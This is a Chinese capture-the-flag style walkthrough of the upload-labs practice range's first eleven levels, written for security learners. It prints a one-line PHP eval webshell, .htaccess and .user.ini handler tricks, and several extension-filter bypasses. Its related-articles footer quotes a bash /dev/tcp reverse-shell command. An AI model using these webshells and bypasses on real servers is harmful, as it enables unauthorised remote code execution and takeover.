【靶场】upload-labs-master(前11关)

2024-09-04 01:12
文章标签 靶场 upload labs master

本文主要是介绍【靶场】upload-labs-master(前11关),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

🏘️个人主页: 点燃银河尽头的篝火(●’◡’●)
如果文章有帮到你的话记得点赞👍+收藏💗支持一下哦

【靶场】upload-labs-master(前11关)

  • 第一关 Pass-01
  • 第二关 Pass-02
  • 第三关 Pass-03
  • 第四关 Pass-04
  • 第五关 Pass-05
  • 第六关 Pass-06
  • 第七关 Pass-07
  • 第八关 Pass-08
  • 第九关 Pass-09
  • 第十关 Pass-10
  • 第十一关 Pass-11


第一关 Pass-01

  1. 创建一个一句话木马,将其改为图片文件

一句话木马示例:

<?php @eval($_POST['hacker']); ?>

在这里插入图片描述

  1. 在靶场中上传图片文件并抓包
    在这里插入图片描述

  2. 将抓包到的文件后缀名改为.php
    在这里插入图片描述

  3. 返回靶场在新标签页中打开图片
    在这里插入图片描述

  4. 新标签页无任何显示即为成功解析
    在这里插入图片描述


第二关 Pass-02

  1. 查看源码发现后端PHP代码只对type进行了检查
    在这里插入图片描述

  2. 上传图片文件后抓包,将上传的PHP的content-type为image/png
    在这里插入图片描述


第三关 Pass-03

  1. 查看源码,发现禁止上传.php,那我们就上传.php3/.php5
    在这里插入图片描述

  2. 上传图片文件并抓包
    在这里插入图片描述

  3. 更改文件后缀名为.php3/.php5(我这里用了.php5)
    在这里插入图片描述


第四关 Pass-04

  1. 查看源码,发现.htaccess文件没有被禁
    在这里插入图片描述

  2. 试试上传.htaccess文件

先新建一个.htaccess文件,里面写上代码

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php

这串代码的意思是如果文件中有一个1.jpg的文件,他就会被解析为.php,把这个文件上传上去。

上传.hatccess文件后继续上传1.jpg

  1. 在新标签页打开图片

第五关 Pass-05

  1. 查看源码
    源码里把所有可以解析的后缀名都给写死了,包括大小写,转换,空格,还有点号,正常的php类文件上传不了了,并且拒绝上传 .htaccess 文件。
    反复观察发现没有被限制的后缀名有 .php7 以及 .ini
    在这里插入图片描述
    我们可以用.ini绕过
  2. 创建一个.user.ini文件并上传
    在这里插入图片描述

.user.ini文件里的意思是:所有的php文件都自动包含1.jpg文件。.user.ini相当于一个用户自定义的php.ini

  1. 继续上传1.jpg

第六关 Pass-06

  1. 查看源码,发现没有过滤大小写
    在这里插入图片描述

  2. 用大小写绕过
    .php 格式改为.Php 后上传即可


第七关 Pass-07

  1. 查看源码,发现没有首位去空
    在这里插入图片描述

  2. 用空格绕过
    抓包,修改上传文件后缀名为.php⚪(注意这里有个空格)
    在这里插入图片描述


第八关 Pass-08

  1. 查看源码,发现没有过滤文件名末尾的点
    在这里插入图片描述

  2. 可以使用文件名后加.进行绕过
    在这里插入图片描述


第九关 Pass-09

  1. 查看源码,发现没有去除字符串::$DATA
    在这里插入图片描述

  2. 上传图片文件,抓包改后缀为.php::$DATA
    在这里插入图片描述


第十关 Pass-10

  1. 查看源码,发现不能用特殊格式绕过
    在这里插入图片描述

  2. 将文件后缀名改为php. .
    在这里插入图片描述


第十一关 Pass-11

  1. 查看提示
    在这里插入图片描述

  2. 可以用双写绕过
    在这里插入图片描述


这篇关于【靶场】upload-labs-master(前11关)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1134578

相关文章

BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

java线程深度解析(四)——并发模型(Master-Worker)

http://blog.csdn.net/daybreak1209/article/details/51372929 二、Master-worker ——分而治之      Master-worker常用的并行模式之一,核心思想是由两个进程协作工作,master负责接收和分配任务,worker负责处理任务,并把处理结果返回给Master进程,由Master进行汇总,返回给客

【CTF Web】BUUCTF Upload-Labs-Linux Pass-13 Writeup(文件上传+PHP+文件包含漏洞+PNG图片马)

Upload-Labs-Linux 1 点击部署靶机。 简介 upload-labs是一个使用php语言编写的,专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关,每一关都包含着不同上传方式。 注意 1.每一关没有固定的通关方法,大家不要自限思维! 2.本项目提供的writeup只是起一个参考作用,希望大家可以分享出自己的通关思路

xss-labs-master通关教程

一.level1 先来进行一下代码审计 <?php ini_set("display_errors", 0);//关闭错误显示$str = $_GET["name"]; //接受URL来的get形式的name传参echo "<h2 align=center>欢迎用户".$str."</h2>";//在网页输出,并不是echo执行的,而是echo把HTML代码发送到浏览器,浏览器对发送的H

log4j靶场,反弹shell

1.用vulhub靶场搭建,首先进入目录CVE-2021-44228中,docker启动命令 2.发现端口是8983,浏览器访问http://172.16.1.18:8983/ 3.用dnslog平台检测dns回显,看看有没有漏洞存在 4.反弹shell到kali(ip为172.16.1.18)的8888端口 bash -i >& /dev/tcp/172.16.1.18

Dungeon Master -uva

一个简答的三维BFS遍历,我从中领悟到了惨痛的教训,关于栈的溢出!!! 不多说了。。郁闷 #include<stdio.h>#include<string.h>#include<stdlib.h>#define MAX_SIZE 50 + 10int Dung[MAX_SIZE][MAX_SIZE][MAX_SIZE];int time[MAX_SIZE][MAX_SIZE][M

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

安装 SideFX Labs

介绍 SideFX Labs 是一个完全免费开源的工具集。GIT地址:github.com/sideeffects/SideFXLabs 它是一个针对150多种工具的测试场,由于这些工具是在常规的 Houdini 开发周期之外开发的,因此可以更方便地进行测试和反馈。 其中的工具总结了常见的工作流程,并与常用软件建立了紧密的集成。目的是帮助用户更快地启动和执行“数字化内容创建”中常见的各种任

【红日靶场】ATTCK实战系列——红队实战(一)手把手教程

目录 入侵网络的思路 一些概念 (1)工作组 (2)域 (3)账号 红日靶机(一) 网络结构 下载 配置web服务器的两张网卡 配置内网的两台机器(域控和域内主机) 渗透web服务器 外网信息搜集 (1)外网信息搜集的内容 (2)开始信息搜集(主要是利用工具) 漏洞利用 (1)漏洞利用的两种方式 (2)利用phpMyAdmin (3)开启3389端口远程桌面

VUE饿了么UPload组件自定义上传

代码: 1.视图: <el-dialog :title="dialogTitle" width="30%" :visible.sync="dialogFormVisible" :destroy-on-close="true"><el-form ref="fileForm" class="items-align" ><el-form-item><el-upload:limit="1"class